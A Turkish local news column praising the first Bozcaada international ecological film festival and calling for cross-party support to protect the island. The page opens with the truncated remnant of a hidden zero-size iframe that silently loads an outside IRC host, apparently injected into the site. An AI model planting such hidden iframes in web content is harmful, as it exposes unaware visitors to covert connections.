src="http://http://irc.ayva.org:4036/?nick=&auto=1" width="0" height="0" marginwidth="1" marginheight="1" scrolling="no" border="0" frameborder="0">
Bugun...
BIFED Bozcaada'ya ne katar?


Serkan İlik
serkanilik@gmail.com
 
 

Yıllardır televizyonlarda, gazetelerde film festivalleri hakkında haberler okuyunca aslında Bozcaada'da da böyle bir film festivali neden olmasın ki diye düşünürdüm. Hatta bunu sadece ben değil birçok adalı arkadaştan da zaman zaman duyardım.

Hele son yıllarda turizm ile birlikte Bozcaada'da artan sanatsal faaliyetlerle bu film festivali fikirlerini çokça duymaya başlamıştım. Ha bir de herkes gibi Bademlik tarafında bulunan doğal taş ocağının amfi tiyatro olarak düzenlenmesi gerektiğini düşünüyorum.

Lafı çok uzatmadan konuya geçeyim. Bildiğiniz gibi yıllarca birçoğumuzun aklından geçen film festivali yarın başlayıp gerçek olacak. Yeni Belediye yönetimi kısa zamanda böyle bir organizasyonu gerçekleştirerek bu festivalin ilk adımlarını atmış bulunmakta.

Hem uluslararası olması hem de ekolojik olması ile de Türkiye'de bir ilk olma özelliği taşıyor bu festival.

Bana göre daha sevindirici tarafı ise festivale böyle kısa bir sürede 37 ülkeden 175 filmin katılmış olması. Yani bu kısa sürede bu kadar katılımın olması başlangıç için festival ekibinin başarısının ve festivalin ne kadar ciddiye alındığının bir göstergesidir.

Ancak festivali düzenleyen ekibin de söylediği gibi asıl iş bundan sonra ada halkının bu festivale sahip çıkması ile devam edecek. Evet, yine söyledikleri gibi ilk kez gerçekleşecek olan festivale akın akın insan gelmesini beklemek yanlış olur. Ama uzun vadede başarı geldikçe inanın festivalin hem ekonomik hem sanatsal hem de değerlerimiz açısından adamıza çok büyük katkısı olacak.

Hele ki ülkemizde bir inşaat çılgınlığı varken, ağaçların kesilerek yerlerine koca koca binalar yapılıyorken, ekoloji teması Bozcaada için çok büyük öneme sahip olacaktır.

***

Biliyorsunuz artık Türkiye'de Karadeniz’den tutun da bütün yeşil alanlar yavaş yavaş rantın kurbanı olarak yok olmaya başladı ve son zamanlarda bu tartışmalardan Bozcaada da nasibini aldı.

Diyeceğim şu ki; bu festivale parti ,siyaset ve birtakım çıkarlar gözetmeden herkesin destek vermesi gerekiyor. Bugün CHP ‘li belediye olabilir ama 5-10-20 sene sonra kim gelirse gelsin bu festivalin yaşatılması gerekiyor.

Çünkü bana göre gerçekten bu festivale yani uluslararası ekolojik film festivaline sahip çıkmak Bozcaada'ya sahip çıkmak, üzümüne sahip çıkmak, denizine, plajlarına ve evlerine varana kadar sahip çıkmak demektir.

Düşünsenize Bozcaada her sene uluslararası arenada kendinden ekolojik film festivali vesilesiyle söz ettirdikçe adanın doğasını katletmek isteyenlerin elleri, kolları nasıl da bağlı kalacaktır.

İnanın belki çok abartı konuşuyor olabilirim fakat birçok festival bu şekilde yola çıkmış ve şimdi bu şekilde herkesin bildiği festival halini almıştır.

***

Kaymakamımız Abdulgani Mağ ile festival hakkında konuştuğumuz zaman "neden ileride Altın Portakal, Altın Ayı ödülleri gibi bizim de 'Altın Asma' ödülümüz olmasın" demişti. Gerçekten de Sayın Kaymakamımızın dediği gibi neden Altın Asma ödüllerimiz olmasın!

Yarın festivalin ilk filmi saat 10:00‘da Halk Eğitim Merkezi salonunda gösterilecek. Ben şimdiden izleyeceğim filmleri belirledim Eminim bu filmlere giderek ve gelen konukları Bozcaada misafirperverliği ile en iyi şekilde ağırlayarak festivalin yaşatılması ve uzun soluklu olması için herkes elinden geleni yapacaktır.Bu yazı 2094 defa okunmuştur.

YORUMLAR

Henüz Yorum Eklenmemiştir.Bu Haber'e ilk yorum yapan siz olun.

YORUM YAZFACEBOOK YORUM
Yorum

YAZARIN DİĞER YAZILARI

HABER ARA
SON YORUMLANANLAR HABERLER
ÇOK OKUNAN HABERLER
VİDEO GALERİ
FOTO GALERİ
bozcaada
GÜNDEMDEN BAŞLIKLAR

GESTAŞ'ın %25 zam yapmasını ve sonra da 5TL indirimini nasıl değerlendiriyorsunuz?


 YUKARI